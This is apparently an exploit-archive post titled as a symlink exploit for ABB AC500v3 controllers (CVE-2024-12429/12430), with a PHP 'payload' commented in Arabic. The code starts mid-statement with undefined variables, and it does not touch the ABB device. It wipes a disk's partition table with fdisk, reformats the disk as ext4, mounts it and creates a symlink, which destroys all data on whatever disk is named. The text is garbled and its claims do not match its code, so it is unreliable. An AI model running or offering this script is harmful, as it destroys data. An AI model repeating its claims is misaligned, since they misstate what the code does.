============================================================================================================================================= | # Title : ABB AC500v3 3.7.0.569 Exploiting Symlink vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://global.abb/ | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Exploiting Symlink on ABB AC500 System Using PHP. (Related : https://packetstorm.news/files/id/188713/ Related CVE numbers: CVE-2024-12429, CVE-2024-12430 ) . [+] Usage : C:\www>php 2.php /dev/sdX [+] PayLoad : /dev/null"); // حذف جميع الأقسام الحالية على القرص $fdiskCommands = "o\nw\n"; file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands); exec("fdisk {$disk} < /tmp/fdisk_commands.txt"); // إنشاء قسم جديد على القرص $fdiskCommands = "n\np\n1\n\n\nw\n"; file_put_contents("/tmp/fdisk_commands.txt", $fdiskCommands); exec("fdisk {$disk} < /tmp/fdisk_commands.txt"); exec("partprobe {$disk}"); // تنسيق القسم باستخدام ext4 exec("mkfs.ext4 -F {$part}"); // إنشاء مجلد للنقطة المثبتة mkdir($mountPoint, 0777, true); // تركيب القسم exec("mount {$part} {$mountPoint}"); // إنشاء رابط رمزي symlink($symLinkTarget, "{$mountPoint}/{$symLinkName}"); // عرض محتويات المجلد بعد إنشاء الرابط الرمزي exec("ls -l {$mountPoint}"); // إلغاء تحميل القسم exec("umount {$mountPoint}"); echo "Done.\n"; Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================